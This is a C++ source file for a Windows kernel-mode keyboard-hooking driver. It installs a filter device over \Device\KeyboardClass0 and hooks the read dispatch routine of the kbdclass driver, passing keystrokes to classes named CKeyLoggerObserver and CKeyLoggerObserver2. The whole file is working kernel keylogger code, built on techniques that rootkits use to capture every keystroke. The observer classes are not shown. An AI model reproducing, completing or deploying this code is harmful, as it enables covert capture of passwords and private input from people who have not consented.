#include "InstallHooks.h"
#include "CKBFilterManager.h"
#include "CKbdclassHook.h"
#include "CKeyLoggerObserver.h"

#include <stdexcept>

CFilterManager *g_pFiltersManager;
IFiltersManager *g_pFilterManager = NULL;
CKeyLoggerObserver *g_pSimpleHookObserver = NULL;

void InstallSimpleHooks(PDRIVER_OBJECT pDriverObject){
    PDEVICE_OBJECT pKeyboardDeviceObject = NULL;
    NTSTATUS lStatus = IoCreateDevice(pDriverObject,
                                      0,
                                      NULL,
                                      FILE_DEVICE_KEYBOARD,
                                      0,
                                      FALSE,
                                      &pKeyboardDeviceObject);

		if (!NT_SUCCESS(lStatus)){
			throw(std::runtime_error("[KBHookDriver]Cannot create keyboard device."));
		}

	pKeyboardDeviceObject->Flags = pKeyboardDeviceObject->Flags | (DO_BUFFERED_IO | DO_POWER_PAGABLE);
	pKeyboardDeviceObject->Flags = pKeyboardDeviceObject->Flags & ~DO_DEVICE_INITIALIZING;

	UNICODE_STRING usClassName;

	RtlInitUnicodeString(&usClassName, L"\\Device\\KeyboardClass0");

	PDEVICE_OBJECT pClassDeviceObject = NULL;
	PFILE_OBJECT pClassFileObject = NULL;

	lStatus = IoGetDeviceObjectPointer(&usClassName, FILE_READ_DATA, &pClassFileObject, &pClassDeviceObject);

		if (!NT_SUCCESS(lStatus)){
			throw(std::runtime_error("[KBHookDriver]Cannot get device object of \\Device\\KeyboardClass0."));
		}

	g_pSimpleHookObserver = new CKeyLoggerObserver();
	g_pFiltersManager = new CFilterManager();
	g_pFiltersManager->RegisterFilter(pKeyboardDeviceObject, pClassDeviceObject, g_pSimpleHookObserver);
	g_pFiltersManager->GetFilter(pKeyboardDeviceObject)->AttachFilter();
	g_pFilterManager = g_pFiltersManager;

	return;
}

void UninstallSimpleHooks(void){

	delete g_pFiltersManager;
	delete g_pSimpleHookObserver;

	return;
}

CKbdclassHook *g_pKbdclassHooker = NULL;
CKeyLoggerObserver2 *g_pExtendedHookObserver = NULL;

NTSTATUS CallKbdclass_DispatchRead(PDEVICE_OBJECT pDeviceObject, PIRP pIRP);

void InstallKbdclassHook(void){

	g_pExtendedHookObserver = new CKeyLoggerObserver2();
	g_pKbdclassHooker = new CKbdclassHook(L"\\Driver\\kbdclass", 
										   CallKbdclass_DispatchRead, 
										   g_pExtendedHookObserver);
	g_pKbdclassHooker->Hook();

	return;
}

NTSTATUS CallKbdclass_DispatchRead(PDEVICE_OBJECT pDeviceObject, PIRP pIRP){
	NTSTATUS lStatus = STATUS_SUCCESS;

		try{
			lStatus = g_pKbdclassHooker->Call_DispatchRead(pDeviceObject, pIRP);
		}
		catch(std::exception& ex){
			DbgPrint("[KBHookLib]%s\n", ex.what());
		}

	return(lStatus);
}

void UninstallKbdclassHook(void){

	g_pKbdclassHooker->Unhook();

	delete g_pKbdclassHooker;
	delete g_pExtendedHookObserver;

	return;
}
